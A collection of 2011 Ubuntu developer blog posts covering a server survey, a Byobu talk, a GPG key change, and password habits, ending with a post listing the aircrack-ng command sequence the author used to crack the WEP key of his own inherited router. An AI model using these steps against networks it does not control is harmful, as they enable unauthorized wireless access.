Ubuntu Server Survey 2011

Take advantage of your voice in the direction of the Ubuntu Server!

We invite your comments and opinions in the 2011 edition of the Ubuntu Server Survey.  What do you need from your Linux servers?  What are your preferred management tools?  Favorite storage solutions?  What else do you want out of your Linux servers?

http://survey.ubuntu.com/

Cheers,
:-Dustin

Working toward Ubuntu 11.04 Server

Ahmed Kamal and I had a discussion on camera here at the Ubuntu Developer Rally in Dallas, Texas.  We talked a bit about the Ubuntu Server's road map this development cycle toward the upcoming Ubuntu 11.04 release in April 2011.   It was a nice opportunity halfway through the Natty development cycle to take a step back and see what we've accomplished, and what we're still working on for the current release.  Enjoy!




:-Dustin

SCALE9x - Byobu: GNU Screen for Human Beings

 

I'm quite pleased that my presentation proposal has been accepted to the SCALE9x conference, to be held February 25 - 27, 2011 in Los Angeles, CA.  I hope you'll join me for...

Byobu: GNU Screen for Human Beings

 

Category: Developers Track, Technology

Audience: Advanced, Intermediate, Beginner, Everyone

Abstract:

Unleash the power of your command line environment through this innovative, intuitive take on GNU Screen!

UNIX and Linux system administrators have been blessed with the GNU Screen utility for almost 25 years. Expert Screen users will swear by its importance in their toolbox. But the learning curve for new users getting started can be quite steep.

Enter 'Byobu', an innovative, intuitive approach to GNU Screen, brought to you by the Ubuntu Server community. Byobu is a set of wrapper scripts and configuration settings that unleash the power of GNU Screen for beginner and novice system administrators, while continuing to support Screen's advanced features for expert users.

Byobu includes convenient keybindings, useful status scripts, sensible configuration defaults, and a curses-based utility for modifying some of Screen's most important (but most buried) features.

In this presentation, the author of Byobu will introduce the basic flow of operation, and move into the advanced features of Byobu and GNU Screen. Any Linux user attending this presentation will be more productive when interfacing with their command line hereafter...


:-Dustin

New RSA 4096 GPG Key

Welcome to 2011!

I'm ringing in the new year by transitioning to a new, stronger GPG key (F1529469).  I followed the excellent instructions from the Ubuntu Security Team (thanks guys!) and the process has been relatively painless.

If you’ve signed my old key (83A61194), I’d appreciate it if you could review my signed transition statement and sign my new key too.

Thanks!
:-Dustin

Ubuntu and an Eagle Scout Candidate

I never made it to Boy Scout status.  I had a lot of fun as a Cub Scout and as a Webelos, but at about 10 years old, I opted out, in favor of spending as much time as possible hunting and fishing in the swamps of south Louisiana with my dad and my uncles.

But I have always had considerable respect for my friends who made it all the way to Eagle Scout.

Dr. Valerie Taylor, the head of the Computer Science department at my alma mater, Texas A&M University shared this story with me recently, and I really enjoyed it.  I thought I would pass it along, here, to Planet Ubuntu...


http://www.wisdomgroup.com/blog/ubuntu_lab_built_by_scouts/

In short, Eagle Scout candidate Raymond Westbrook of Boy Scout Troop 534 from Chicago, IL built a computer lab from 6 recycled PCs and running Ubuntu 10.04.  The lab is now available to members of the community, particularly the youth.

I thought this was a pretty cool story, and a fun way to start the year.

Happy New Year,
:-Dustin

So Many Passwords...

Courtesy: http://xkcd.com/792/

Yesterday, there was an announcement that hashes Gawker Media's account passwords had been compromised and published on the internet. I had never heard of Gawker Media.

Whoa, sucks for them!

A few hours later, I received an email from LifeHacker saying that its accounts are actually managed by Gawker and that there's a chance that my account might have been compromised.

Dang, sucks for me :-(

So I spent some time thinking about it, and I've decided I'm going to take a new approach to passwords and my hundreds of disparate accounts on the web...

The Code

1. I am going to use even stronger passphrases for each of my primary accounts.
2. I am going to always use different passphrases for each of those primary accounts.
3. I am going to memorize each of those passphrases from (1) and (2).
   
   
4. For all secondary accounts, I am going to use unique, randomly generated passphrases, perhaps created like this:
   

   apg -a 1 -m 15 -M SNCL -n 1 -c /dev/urandom

5. I am not going to memorize any passphrases for secondary accounts. Rather, I will entrust my browser to save those passwords (which are stored in my encrypted home directory). I will use a password reset function any time I lose or forget or clear that database.
6. I will maintain ~/.passwords.gpg -- an encrypted text file with all of my accounts and passwords, and use the gnugpg.vim plug to securely edit the file.

(1), (2), and (3) are really no different for what I do now.

(4), (5) and (6) are what's really new to me. As of now, I'm separating primary and secondary accounts. I won't even attempt to remember passwords for the hundreds of secondary accounts out there. I'll randomly generate new passwords for each, cache that in my local application (which I believe is better protected), and just reset those passwords as necessary.

Definitions

• Primary accounts - the few things that I need or else I'm unable to get work done, or access other critical data (e.g. Gmail, Launchpad/Ubuntu SSO, ssh, gpg, eCryptfs)
• Secondary accounts - everything else that has a password reset function and can be securely and locally cached in a browser's (or other application's) saved password database (e.g. Facebook, LinkedIn, Twitter, my banks, et al.)

Using the above, I will:

1. Minimize the number of passphrases I have to remember.
2. Strengthen and diversify the passphrases to my few primary accounts.
3. Eliminate the possibility of any passphrase being cracked by brute force.
4. Consolidate the risk of any one passphrase being stolen to that account alone.

Does anyone else have better solutions to these problems?

Cheers,

:-Dustin

These aren't the droids you're looking for

I recently inherited a disused Linksys wireless router. The previous owner had long since forgotten the WEP passphrase (although he still had embedded devices around the house that were connected to the WAP). Of course, it's trivial to reset a Linksys router back to the factory defaults, which I would use eventually. But before I did that, I thought I would try something else first.

Having never tried to crack a WEP key before, I thought this would be a nice opportunity to learn how. There are plenty of excellent, detailed tutorials out there. And this blog post isn't one of them.

It's merely a "note to self" -- what worked for me at this point in time. So if you're looking for a detailed explanation of the process or perhaps support in your quest, "These aren't the droids you're looking for. Move along, move along."

First, I created a directory to store the captured packets.

DIR=$(mktemp -d)
cd $DIR

I then installed the utilities from the 10.10 archive.

sudo apt-get install aircrack-ng

Next, I checked my interface.

sudo airmon-ng check wlan0

And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitoring mode on the interface.

sudo airmon-ng start wlan0

Now, I needed to scan the airwaves, looking for my access point.

sudo airodump-ng mon0

When I recognized the ESSID I was looking for, I noted the BSSID and Channel number. Then, I started replaying ARP requests.

sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0

I let this run for a while in one window. At the same time, I started capturing replies in another window.

sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0

And in a third window, I started analyzing the captured data, looking for the key.

sudo aircrack-ng *cap

It took about ~7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!

:-Dustin